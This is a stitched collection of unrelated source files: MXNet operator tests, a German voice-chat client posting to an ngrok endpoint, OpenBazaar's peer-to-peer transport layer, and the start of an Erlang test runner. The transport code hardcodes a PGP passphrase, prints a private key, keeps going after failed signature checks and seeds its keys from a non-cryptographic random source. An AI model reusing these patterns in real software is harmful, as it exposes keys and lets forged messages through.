def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
mx.util.set_np_shape(True) # Must be done to prevent zero-sized dimension conversion to 'unknown'
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
seq_last()
seq_reverse()
seq_mask()
|
client.py
|
import requests
import json
import threading
import speech_recognition as sr
import logging
from flask import Flask, request
from speech_handling.text_to_speech import SapiTTS, GoogleTTS
logger = logging.getLogger(__name__)
app = Flask(__name__)
tts = GoogleTTS()
recognizer = sr.Recognizer()
def send_message_to_voice_channel(message):
# encoded_query = quote(query)
print(f'sending message {message}')
url = "http://5fb525f4.ngrok.io/app/message"
data = {"sender": "user", "message": message}
data_json = json.dumps(data)
headers = {'Content-Type': 'application/json'}
requests.post(
url=url,
data=data_json,
headers=headers
)
def speech_to_text():
with sr.Microphone() as source:
print('Listening...')
# increase threshold if stt tries to recognize for too long
recognizer.energy_threshold = 1000
audio = recognizer.listen(source)
recognizer.adjust_for_ambient_noise(source)
try:
message = recognizer.recognize_google(audio, language="de_DE")
print(f'Deine Eingabe: {message}')
send_message_to_voice_channel(message)
except sr.UnknownValueError:
tts.utter_voice_message("Ich habe dich leider nicht verstanden")
logger.warning("Could not understand audio")
except sr.RequestError as e:
logger.error(f"Error: {e}")
def command_line_input():
message = input("User: ")
send_message_to_voice_channel(message)
@app.route("/", methods=['POST'])
def receive_bot_response():
payload = request.json
message = payload.get("message", None)
print(f'Bot: {message}')
return "success", 200
thread = threading.Thread(target=app.run)
thread.start()
send_message_to_voice_channel('/start')
while True:
speech_to_text()
|
transport.py
|
import connection
from dht import DHT
from protocol import hello_request
from protocol import hello_response
from protocol import goodbye
from protocol import proto_response_pubkey
from urlparse import urlparse
from zmq.eventloop import ioloop, zmqstream
from zmq.eventloop.ioloop import PeriodicCallback
from collections import defaultdict
from pprint import pformat
from pybitcointools.main import privkey_to_pubkey
from pybitcointools.main import privtopub
from pybitcointools.main import random_key
from crypto_util import pubkey_to_pyelliptic
from crypto_util import makePrivCryptor
from crypto_util import makePubCryptor
from pysqlcipher.dbapi2 import OperationalError, DatabaseError
import gnupg
import xmlrpclib
import logging
import pyelliptic as ec
import requests
import json
import socket
import traceback
from threading import Thread
import zlib
import obelisk
import network_util
import zmq
import random
import hashlib
ioloop.install()
class TransportLayer(object):
# Transport layer manages a list of peers
def __init__(self, market_id, my_ip, my_port, my_guid, nickname=None):
self.peers = {}
self.callbacks = defaultdict(list)
self.timeouts = []
self.port = my_port
self.ip = my_ip
self.guid = my_guid
self.market_id = market_id
self.nickname = nickname
self.handler = None
try:
socket.inet_pton(socket.AF_INET6, my_ip)
my_uri = 'tcp://[%s]:%s' % (self.ip, self.port)
except (socket.error, ValueError):
my_uri = 'tcp://%s:%s' % (self.ip, self.port)
self.uri = my_uri
self.log = logging.getLogger(
'[%s] %s' % (market_id, self.__class__.__name__)
)
def add_callbacks(self, callbacks):
for section, callback in callbacks:
self.callbacks[section] = []
self.add_callback(section, callback)
def set_websocket_handler(self, handler):
self.handler = handler
def add_callback(self, section, callback):
if callback not in self.callbacks[section]:
self.callbacks[section].append(callback)
def trigger_callbacks(self, section, *data):
# Run all callbacks in specified section
for cb in self.callbacks[section]:
cb(*data)
# Run all callbacks registered under the 'all' section. Don't duplicate
# calls if the specified section was 'all'.
if not section == 'all':
for cb in self.callbacks['all']:
cb(*data)
def get_profile(self):
return hello_request({'uri': self.uri})
def listen(self, pubkey):
self.log.info("Listening at: %s:%s" % (self.ip, self.port))
self.ctx = zmq.Context()
self.socket = self.ctx.socket(zmq.REP)
if network_util.is_loopback_addr(self.ip):
try:
# we are in local test mode so bind that socket on the
# specified IP
self.socket.bind(self.uri)
except Exception as e:
error_message = "\n\nTransportLayer.listen() error!!!: "
error_message += "Could not bind socket to " + self.uri
error_message += " (" + str(e) + ")"
import platform
if platform.system() == 'Darwin':
error_message += "\n\nPerhaps you have not added a "\
"loopback alias yet.\n"
error_message += "Try this on your terminal and restart "\
"OpenBazaar in development mode again:\n"
error_message += "\n\t$ sudo ifconfig lo0 alias 127.0.0.2"
error_message += "\n\n"
raise Exception(error_message)
else:
try:
socket.inet_pton(socket.AF_INET6, self.ip)
self.socket.ipv6 = True
self.socket.bind('tcp://[*]:%s' % self.port)
except (AttributeError, socket.error, ValueError):
self.socket.bind('tcp://*:%s' % self.port)
self.stream = zmqstream.ZMQStream(
self.socket, io_loop=ioloop.IOLoop.current()
)
def handle_recv(message):
for msg in message:
self._on_raw_message(msg)
self.stream.send(
json.dumps({
'type': 'ok',
'senderGUID': self.guid,
'pubkey': pubkey,
'senderNick': self.nickname
})
)
self.stream.on_recv(handle_recv)
def closed(self, *args):
self.log.info("client left")
def _init_peer(self, msg):
uri = msg['uri']
if uri not in self.peers:
self.peers[uri] = connection.PeerConnection(self, uri)
def remove_peer(self, uri, guid):
self.log.info("Removing peer %s", uri)
ip = urlparse(uri).hostname
port = urlparse(uri).port
if (ip, port, guid) in self.shortlist:
self.shortlist.remove((ip, port, guid))
self.log.info('Removed')
# try:
# del self.peers[uri]
# msg = {
# 'type': 'peer_remove',
# 'uri': uri
# }
# self.trigger_callbacks(msg['type'], msg)
#
# except KeyError:
# self.log.info("Peer %s was already removed", uri)
def send(self, data, send_to=None, callback=lambda msg: None):
self.log.info("Outgoing Data: %s %s" % (data, send_to))
data['senderNick'] = self.nickname
# Directed message
if send_to is not None:
peer = self.dht.routingTable.getContact(send_to)
# self.log.debug(
# '%s %s %s' % (peer.guid, peer.address, peer.pub)
# )
peer.send(data, callback=callback)
return
else:
# FindKey and then send
for peer in self.dht.activePeers:
try:
data['senderGUID'] = self.guid
data['pubkey'] = self.pubkey
# if peer.pub:
# peer.send(data, callback)
# else:
print 'test %s' % peer
def cb(msg):
print msg
peer.send(data, cb)
except:
self.log.info("Error sending over peer!")
traceback.print_exc()
def broadcast_goodbye(self):
self.log.info("Broadcast goodbye")
msg = goodbye({'uri': self.uri})
self.send(msg)
def _on_message(self, msg):
# here goes the application callbacks
# we get a "clean" msg which is a dict holding whatever
self.log.info("[On Message] Data received: %s" % msg)
# if not self.routingTable.getContact(msg['senderGUID']):
# Add to contacts if doesn't exist yet
# self._addCryptoPeer(msg['uri'], msg['senderGUID'], msg['pubkey'])
if msg['type'] != 'ok':
self.trigger_callbacks(msg['type'], msg)
def _on_raw_message(self, serialized):
self.log.info("connected " + str(len(serialized)))
try:
msg = json.loads(serialized[0])
except:
self.log.info("incorrect msg! " + serialized)
return
msg_type = msg.get('type')
if msg_type == 'hello_request' and msg.get('uri'):
self._init_peer(msg)
else:
self._on_message(msg)
def valid_peer_uri(self, uri):
try:
[_, self_addr, _] = network_util.uri_parts(self.uri)
[other_protocol, other_addr, other_port] = \
network_util.uri_parts(uri)
except RuntimeError:
return False
if not network_util.is_valid_protocol(other_protocol) \
or not network_util.is_valid_port(other_port):
return False
if network_util.is_private_ip_address(self_addr):
if not network_util.is_private_ip_address(other_addr):
self.log.warning((
'Trying to connect to external '
'network with a private ip address.'
))
else:
if network_util.is_private_ip_address(other_addr):
return False
return True
def shutdown(self):
if self.ctx is not None:
print "TransportLayer.shutdown() destroying zmq ctx sockets."
self.ctx.destroy(linger=None)
class CryptoTransportLayer(TransportLayer):
def __init__(self, my_ip, my_port, market_id, db, bm_user=None, bm_pass=None,
bm_port=None, seed_mode=0, dev_mode=False, disable_ip_update=False):
self.log = logging.getLogger(
'[%s] %s' % (market_id, self.__class__.__name__)
)
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
# Connect to database
self.db = db
self.bitmessage_api = None
if (bm_user, bm_pass, bm_port) != (None, None, None):
if not self._connect_to_bitmessage(bm_user, bm_pass, bm_port):
self.log.info('Bitmessage not installed or started')
try:
socket.inet_pton(socket.AF_INET6, my_ip)
my_uri = "tcp://[%s]:%s" % (my_ip, my_port)
except (socket.error, ValueError):
my_uri = "tcp://%s:%s" % (my_ip, my_port)
self.market_id = market_id
self.nick_mapping = {}
self.uri = my_uri
self.ip = my_ip
self.nickname = ""
self._dev_mode = dev_mode
# Set up
self._setup_settings()
self.dht = DHT(self, self.market_id, self.settings, self.db)
# self._myself = ec.ECC(pubkey=self.pubkey.decode('hex'),
# privkey=self.secret.decode('hex'),
# curve='secp256k1')
TransportLayer.__init__(self, market_id, my_ip, my_port,
self.guid, self.nickname)
self.setup_callbacks()
self.listen(self.pubkey)
if seed_mode == 0 and not dev_mode and not disable_ip_update:
self.start_ip_address_checker()
def setup_callbacks(self):
self.add_callbacks([('hello', self._ping),
('findNode', self._find_node),
('findNodeResponse', self._find_node_response),
('store', self._store_value)])
def start_ip_address_checker(self):
'''Checks for possible public IP change'''
self.caller = PeriodicCallback(self._ip_updater_periodic_callback, 5000, ioloop.IOLoop.instance())
self.caller.start()
def _ip_updater_periodic_callback(self):
try:
r = requests.get('http://ipv4.icanhazip.com')
if r and hasattr(r, 'text'):
ip = r.text
ip = ip.strip(' \t\n\r')
if ip != self.ip:
self.ip = ip
try:
socket.inet_pton(socket.AF_INET6, self.ip)
my_uri = 'tcp://[%s]:%s' % (self.ip, self.port)
except (socket.error, ValueError):
my_uri = 'tcp://%s:%s' % (self.ip, self.port)
self.uri = my_uri
self.stream.close()
self.listen(self.pubkey)
self.dht._iterativeFind(self.guid, [], 'findNode')
else:
self.log.error('Could not get IP')
except Exception as e:
self.log.error('[Requests] error: %s' % e)
def save_peer_to_db(self, peer_tuple):
uri = peer_tuple[0]
pubkey = peer_tuple[1]
guid = peer_tuple[2]
nickname = peer_tuple[3]
# Update query
self.db.deleteEntries("peers", {"uri": uri, "guid": guid}, "OR")
# if len(results) > 0:
# self.db.updateEntries("peers", {"id": results[0]['id']}, {"market_id": self.market_id, "uri": uri, "pubkey": pubkey, "guid": guid, "nickname": nickname})
# else:
if guid is not None:
self.db.insertEntry("peers", {
"uri": uri,
"pubkey": pubkey,
"guid": guid,
"nickname": nickname,
"market_id": self.market_id
})
def _connect_to_bitmessage(self, bm_user, bm_pass, bm_port):
# Get bitmessage going
# First, try to find a local instance
result = False
try:
self.log.info('[_connect_to_bitmessage] Connecting to Bitmessage on port %s' % bm_port)
self.bitmessage_api = xmlrpclib.ServerProxy("http://{}:{}@localhost:{}/".format(bm_user, bm_pass, bm_port), verbose=0)
result = self.bitmessage_api.add(2, 3)
self.log.info("[_connect_to_bitmessage] Bitmessage API is live: %s", result)
# If we failed, fall back to starting our own
except Exception as e:
self.log.info("Failed to connect to bitmessage instance: {}".format(e))
self.bitmessage_api = None
# self._log.info("Spawning internal bitmessage instance")
# # Add bitmessage submodule path
# sys.path.insert(0, os.path.join(
# os.path.dirname(__file__), '..', 'pybitmessage', 'src'))
# import bitmessagemain as bitmessage
# bitmessage.logger.setLevel(logging.WARNING)
# bitmessage_instance = bitmessage.Main()
# bitmessage_instance.start(daemon=True)
# bminfo = bitmessage_instance.getApiAddress()
# if bminfo is not None:
# self._log.info("Started bitmessage daemon at %s:%s".format(
# bminfo['address'], bminfo['port']))
# bitmessage_api = xmlrpclib.ServerProxy("http://{}:{}@{}:{}/".format(
# bm_user, bm_pass, bminfo['address'], bminfo['port']))
# else:
# self._log.info("Failed to start bitmessage dameon")
# self._bitmessage_api = None
return result
def _checkok(self, msg):
self.log.info('Check ok')
def get_guid(self):
return self.guid
def get_dht(self):
return self.dht
def get_bitmessage_api(self):
return self.bitmessage_api
def get_market_id(self):
return self.market_id
# def get_myself(self):
# return self._myself
def _ping(self, msg):
self.log.info('Pinged %s ' % json.dumps(msg, ensure_ascii=False))
#
# pinger = CryptoPeerConnection(self, msg['uri'], msg['pubkey'], msg['senderGUID'])
# pinger.send_raw(json.dumps(
# {"type": "hello_response",
# "senderGUID": self.guid,
# "uri": self.uri,
# "senderNick": self.nickname,
# "pubkey": self.pubkey,
# }))
def _store_value(self, msg):
self.dht._on_storeValue(msg)
def _find_node(self, msg):
self.dht.on_find_node(msg)
def _find_node_response(self, msg):
self.dht.on_findNodeResponse(self, msg)
def _setup_settings(self):
try:
self.settings = self.db.selectEntries("settings", {"market_id": self.market_id})
except (OperationalError, DatabaseError) as e:
print e
raise SystemExit("database file %s corrupt or empty - cannot continue" % self.db.db_path)
if len(self.settings) == 0:
self.settings = {"market_id": self.market_id, "welcome": "enable"}
self.db.insertEntry("settings", self.settings)
else:
self.settings = self.settings[0]
# Generate PGP key during initial setup or if previous PGP gen failed
if not ('PGPPubKey' in self.settings and self.settings["PGPPubKey"]):
try:
self.log.info('Generating PGP keypair. This may take several minutes...')
print 'Generating PGP keypair. This may take several minutes...'
gpg = gnupg.GPG()
input_data = gpg.gen_key_input(key_type="RSA",
key_length=2048,
name_email='[email protected]',
name_comment="Autogenerated by Open Bazaar",
passphrase="P@ssw0rd")
assert input_data is not None
key = gpg.gen_key(input_data)
assert key is not None
pubkey_text = gpg.export_keys(key.fingerprint)
newsettings = {"PGPPubKey": pubkey_text, "PGPPubkeyFingerprint": key.fingerprint}
self.db.updateEntries("settings", {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
self.log.info('PGP keypair generated.')
except Exception as e:
self.log.error("Encountered a problem with GPG: %s" % e)
raise SystemExit("Encountered a problem with GPG: %s" % e)
if not ('pubkey' in self.settings and self.settings['pubkey']):
# Generate Bitcoin keypair
self._generate_new_keypair()
if not ('nickname' in self.settings and self.settings['nickname']):
newsettings = {'nickname': 'Default'}
self.db.updateEntries('settings', {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
self.nickname = self.settings['nickname'] if 'nickname' in self.settings else ""
self.secret = self.settings['secret'] if 'secret' in self.settings else ""
self.pubkey = self.settings['pubkey'] if 'pubkey' in self.settings else ""
self.privkey = self.settings.get('privkey')
self.btc_pubkey = privkey_to_pubkey(self.privkey)
self.guid = self.settings['guid'] if 'guid' in self.settings else ""
self.sin = self.settings['sin'] if 'sin' in self.settings else ""
self.bitmessage = self.settings['bitmessage'] if 'bitmessage' in self.settings else ""
if not ('bitmessage' in self.settings and self.settings['bitmessage']):
# Generate Bitmessage address
if self.bitmessage_api is not None:
self._generate_new_bitmessage_address()
self._myself = ec.ECC(
pubkey=pubkey_to_pyelliptic(self.pubkey).decode('hex'),
raw_privkey=self.secret.decode('hex'),
curve='secp256k1'
)
self.log.debug('Retrieved Settings: \n%s', pformat(self.settings))
def _generate_new_keypair(self):
secret = str(random.randrange(2 ** 256))
self.secret = hashlib.sha256(secret).hexdigest()
self.pubkey = privtopub(self.secret)
self.privkey = random_key()
print 'PRIVATE KEY: ', self.privkey
self.btc_pubkey = privtopub(self.privkey)
print 'PUBLIC KEY: ', self.btc_pubkey
# Generate SIN
sha_hash = hashlib.sha256()
sha_hash.update(self.pubkey)
ripe_hash = hashlib.new('ripemd160')
ripe_hash.update(sha_hash.digest())
self.guid = ripe_hash.digest().encode('hex')
self.sin = obelisk.EncodeBase58Check('\x0F\x02%s' + ripe_hash.digest())
newsettings = {
"secret": self.secret,
"pubkey": self.pubkey,
"privkey": self.privkey,
"guid": self.guid,
"sin": self.sin
}
self.db.updateEntries("settings", {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
def _generate_new_bitmessage_address(self):
# Use the guid generated previously as the key
self.bitmessage = self.bitmessage_api.createRandomAddress(
self.guid.encode('base64'),
False,
1.05,
1.1111
)
newsettings = {"bitmessage": self.bitmessage}
self.db.updateEntries("settings", {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
def join_network(self, seed_peers=None, callback=lambda msg: None):
if seed_peers is None:
seed_peers = []
self.log.info('Joining network')
known_peers = []
# Connect up through seed servers
for idx, seed in enumerate(seed_peers):
try:
socket.inet_pton(socket.AF_INET6, seed)
seed_peers[idx] = "tcp://[%s]:12345" % seed
except (socket.error, ValueError):
seed_peers[idx] = "tcp://%s:12345" % seed
# Connect to persisted peers
db_peers = self.get_past_peers()
known_peers = list(set(seed_peers)) + list(set(db_peers))
self.connect_to_peers(known_peers)
# TODO: This needs rethinking. Normally we can search for ourselves
# but because we are not connected to them quick enough this
# will always fail. Need @gubatron to review
# Populate routing table by searching for self
# if len(known_peers) > 0:
# self.search_for_my_node()
if callback is not None:
callback('Joined')
def get_past_peers(self):
peers = []
result = self.db.selectEntries("peers", {"market_id": self.market_id})
for peer in result:
peers.append(peer['uri'])
return peers
def search_for_my_node(self):
print 'Searching for myself'
self.dht._iterativeFind(self.guid, self.dht.knownNodes, 'findNode')
def connect_to_peers(self, known_peers):
for known_peer in known_peers:
t = Thread(target=self.dht.add_peer, args=(self, known_peer,))
t.start()
def get_crypto_peer(self, guid=None, uri=None, pubkey=None, nickname=None,
callback=None):
if guid == self.guid:
self.log.error('Cannot get CryptoPeerConnection for your own node')
return
self.log.debug('Getting CryptoPeerConnection' +
'\nGUID:%s\nURI:%s\nPubkey:%s\nNickname:%s' %
(guid, uri, pubkey, nickname))
return connection.CryptoPeerConnection(self,
uri,
pubkey,
guid=guid,
nickname=nickname)
def addCryptoPeer(self, peer_to_add):
foundOutdatedPeer = False
for idx, peer in enumerate(self.dht.activePeers):
if (peer.address, peer.guid, peer.pub) == \
(peer_to_add.address, peer_to_add.guid, peer_to_add.pub):
self.log.info('Found existing peer, not adding.')
return
if peer.guid == peer_to_add.guid or \
peer.pub == peer_to_add.pub or \
peer.address == peer_to_add.address:
foundOutdatedPeer = True
self.log.info('Found an outdated peer')
# Update existing peer
self.activePeers[idx] = peer_to_add
self.dht.add_peer(self,
peer_to_add.address,
peer_to_add.pub,
peer_to_add.guid,
peer_to_add.nickname)
if not foundOutdatedPeer and peer_to_add.guid != self.guid:
self.log.info('Adding crypto peer at %s' % peer_to_add.nickname)
self.dht.add_peer(self,
peer_to_add.address,
peer_to_add.pub,
peer_to_add.guid,
peer_to_add.nickname)
def get_profile(self):
peers = {}
self.settings = self.db.selectEntries("settings", {"market_id": self.market_id})[0]
for uri, peer in self.peers.iteritems():
if peer.pub:
peers[uri] = peer.pub.encode('hex')
return {'uri': self.uri,
'pub': self._myself.get_pubkey().encode('hex'),
'nickname': self.nickname,
'peers': peers}
def respond_pubkey_if_mine(self, nickname, ident_pubkey):
if ident_pubkey != self.pubkey:
self.log.info("Public key does not match your identity")
return
# Return signed pubkey
pubkey = self._myself.pubkey
ec_key = obelisk.EllipticCurveKey()
ec_key.set_secret(self.secret)
digest = obelisk.Hash(pubkey)
signature = ec_key.sign(digest)
# Send array of nickname, pubkey, signature to transport layer
self.send(proto_response_pubkey(nickname, pubkey, signature))
def pubkey_exists(self, pub):
for peer in self.peers.itervalues():
self.log.info(
'PEER: %s Pub: %s' % (
peer.pub.encode('hex'), pub.encode('hex')
)
)
if peer.pub.encode('hex') == pub.encode('hex'):
return True
return False
def create_peer(self, uri, pub, node_guid):
if pub:
pub = pub.decode('hex')
# Create the peer if public key is not already in the peer list
# if not self.pubkey_exists(pub):
self.peers[uri] = connection.CryptoPeerConnection(self, uri, pub, node_guid)
# Call 'peer' callbacks on listeners
self.trigger_callbacks('peer', self.peers[uri])
# else:
# print 'Pub Key is already in peer list'
def send(self, data, send_to=None, callback=lambda msg: None):
self.log.debug("Outgoing Data: %s %s" % (data, send_to))
# Directed message
if send_to is not None:
peer = self.dht.routingTable.getContact(send_to)
if not peer:
for activePeer in self.dht.activePeers:
if activePeer.guid == send_to:
peer = activePeer
break
# peer = CryptoPeerConnection(msg['uri'])
if peer:
self.log.debug('Directed Data (%s): %s' % (send_to, data))
try:
peer.send(data, callback=callback)
except Exception as e:
self.log.error('Not sending message directly to peer %s' % e)
else:
self.log.error('No peer found')
else:
# FindKey and then send
for peer in self.dht.activePeers:
try:
peer = self.dht.routingTable.getContact(peer.guid)
data['senderGUID'] = self.guid
data['pubkey'] = self.pubkey
def cb(msg):
self.log.debug('Message Back: \n%s' % pformat(msg))
peer.send(data, cb)
except:
self.log.info("Error sending over peer!")
traceback.print_exc()
def send_enc(self, uri, msg):
peer = self.peers[uri]
pub = peer.pub
# Now send a hello message to the peer
if pub:
self.log.info(
"Sending encrypted [%s] message to %s" % (
msg['type'], uri
)
)
peer.send(msg)
else:
# Will send clear profile on initial if no pub
self.log.info(
"Sending unencrypted [%s] message to %s" % (
msg['type'], uri
)
)
self.peers[uri].send_raw(json.dumps(msg))
def _init_peer(self, msg):
uri = msg['uri']
pub = msg.get('pub')
nickname = msg.get('nickname')
msg_type = msg.get('type')
guid = msg['guid']
if not self.valid_peer_uri(uri):
self.log.error("Invalid Peer: %s " % uri)
return
if uri not in self.peers:
# Unknown peer
self.log.info('Add New Peer: %s' % uri)
self.create_peer(uri, pub, guid)
if not msg_type:
self.send_enc(uri, hello_request(self.get_profile()))
elif msg_type == 'hello_request':
self.send_enc(uri, hello_response(self.get_profile()))
else:
# Known peer
if pub:
# test if we have to update the pubkey
if not self.peers[uri].pub:
self.log.info("Setting public key for seed node")
self.peers[uri].pub = pub.decode('hex')
self.trigger_callbacks('peer', self.peers[uri])
if self.peers[uri].pub != pub.decode('hex'):
self.log.info("Updating public key for node")
self.peers[uri].nickname = nickname
self.peers[uri].pub = pub.decode('hex')
self.trigger_callbacks('peer', self.peers[uri])
if msg_type == 'hello_request':
# reply only if necessary
self.send_enc(uri, hello_response(self.get_profile()))
def _on_message(self, msg):
# here goes the application callbacks
# we get a "clean" msg which is a dict holding whatever
# self.log.info("[On Message] Data received: %s" % msg)
pubkey = msg.get('pubkey')
uri = msg.get('uri')
ip = urlparse(uri).hostname
port = urlparse(uri).port
guid = msg.get('senderGUID')
nickname = msg.get('senderNick')[:120]
self.dht.add_known_node((ip, port, guid, nickname))
self.log.info('On Message: %s' % json.dumps(msg, ensure_ascii=False))
self.dht.add_peer(self, uri, pubkey, guid, nickname)
t = Thread(target=self.trigger_callbacks, args=(msg['type'], msg,))
t.start()
def _on_raw_message(self, serialized):
try:
# Decompress message
serialized = zlib.decompress(serialized)
msg = json.loads(serialized)
self.log.info("Message Received [%s]" % msg.get('type', 'unknown'))
if msg.get('type') is None:
data = msg.get('data').decode('hex')
sig = msg.get('sig').decode('hex')
try:
cryptor = makePrivCryptor(self.secret)
try:
data = cryptor.decrypt(data)
except Exception as e:
self.log.info('Exception: %s' % e)
self.log.debug('Signature: %s' % sig.encode('hex'))
self.log.debug('Signed Data: %s' % data)
# Check signature
data_json = json.loads(data)
sigCryptor = makePubCryptor(data_json['pubkey'])
if sigCryptor.verify(sig, data):
self.log.info('Verified')
else:
self.log.error('Message signature could not be verified %s' % msg)
# return
msg = json.loads(data)
self.log.debug('Message Data %s ' % msg)
except Exception as e:
self.log.error('Could not decrypt message properly %s' % e)
except ValueError:
try:
# Encrypted?
try:
msg = self._myself.decrypt(serialized)
msg = json.loads(msg)
self.log.info(
"Decrypted Message [%s]" % msg.get('type', 'unknown')
)
except:
self.log.error("Could not decrypt message: %s" % msg)
return
except:
self.log.error('Message probably sent using incorrect pubkey')
return
if msg.get('type') is not None:
self._on_message(msg)
else:
self.log.error('Received a message with no type')
def shutdown(self):
print "CryptoTransportLayer.shutdown()!"
try:
TransportLayer.shutdown(self)
print "CryptoTransportLayer.shutdown(): ZMQ sockets destroyed."
except Exception as e:
self.log.error("Transport shutdown error: " + e.message)
print "Notice: explicit DHT Shutdown not implemented."
try:
self.bitmessage_api.close()
except Exception as e:
# might not even be open, not much more we can do on our way out if exception thrown here.
self.log.error("Could not shutdown bitmessage_api's ServerProxy. " + e.message)
|
runtests.py
|
#!/usr/bin/env python
import os
import re
import sys
import glob
import subprocess
from ctypes import c_int
from multiprocessing import Process, Lock, Value, BoundedSemaphore, cpu_count
#---------------------------------------------------------------------
# Extract scenarios from the specified test
def runTest(test):
global dirname
global results
global sema1
# test has the format of '.*/suites/<suite_name>/src/<test_name>(.erl)?'
# Split the test in suite and name components using pattern matching
rest1, name = os.path.split(test)
rest2 = os.path.split(rest1)[0]
suite = os.path.split(rest2)[1]
name = os.path.splitext(name)[0]
if os.path.isdir(test):
# Our test is a multi module directory
dirn = test # directory
modn = "test" # module name
files = glob.glob(dirn + "/*.erl")
else:
dirn = rest1
modn = name
files = [test]
# Create a dir to save the results
try:
os.makedirs(results + "/" + suite + "/results")
except OSError:
pass
# Compile it
os.system("erlc -W0 -o %s %s/%s.erl" % (dirn, dirn, modn))
# And extract scenarios from it
pout = subprocess.check_output(
["erl -boot start_clean -noinput -pa %s -pa %s -s scenarios extract %s -s init stop"
% (dirname, dirn, modn)], shell=True).splitlines()
procS = []
for scenario in pout:
# scenario has the format of {<mod_name>,<func_name>,<preb>}\n
scen = scenario.strip("{}").split(",")
# And run the test
p = Process(
target=runScenario,
args=(suite, name, modn, scen[1], scen[2], scen[3:], files))
sema.acquire()
p.start()
procS.append(p)
# Wait
for p in procS:
p.join()
# Must happen late, in case the test has/needs exceptional
os.remove("%s/%s.beam" % (dirn,modn))
sema1.release()
#---------------------------------------------------------------------
# Run the specified scenario and print the results
def runScenario(suite, name, modn, funn, preb, flags, files):
global concuerror
global results
global dirname
global sema
global lock
global total_tests
global total_failed
if "dpor" in flags:
dpor_flag = "--dpor=optimal"
file_ext = "-dpor"
dpor_output = ""
elif "optimal" in flags:
dpor_flag = "--dpor=optimal"
file_ext = "-optimal"
dpor_output = ""
elif "source" in flags:
dpor_flag = "--dpor=source"
file_ext = "-source"
dpor_output = "source"
elif "persistent" in flags:
dpor_flag = "--dpor=persistent"
file_ext = "-persistent"
dpor_output = "persistent"
else:
dpor_flag = "--dpor=none"
file_ext = "-nodpor"
dpor_output = "disabled"
if preb == "inf":
bound = ""
bound_type = ""
preb_output = ""
else:
bound = ("-b %s") % (preb)
if "bpor" in flags:
bound_type = "-c bpor"
preb_output=("%s/bpor") % (preb)
preb=("%s-bpor") % (preb)
else:
bound_type = "-c delay"
preb_output=("%s/delay") % (preb)
if funn == modn:
funn_output = ""
else:
funn_output = funn
txtname = "%s-%s-%s%s.txt" % (name, funn, preb, file_ext)
rslt = "%s/%s/results/%s" % (results, suite, txtname)
try:
os.remove(rslt)
except OSError:
pass
# Run concuerror
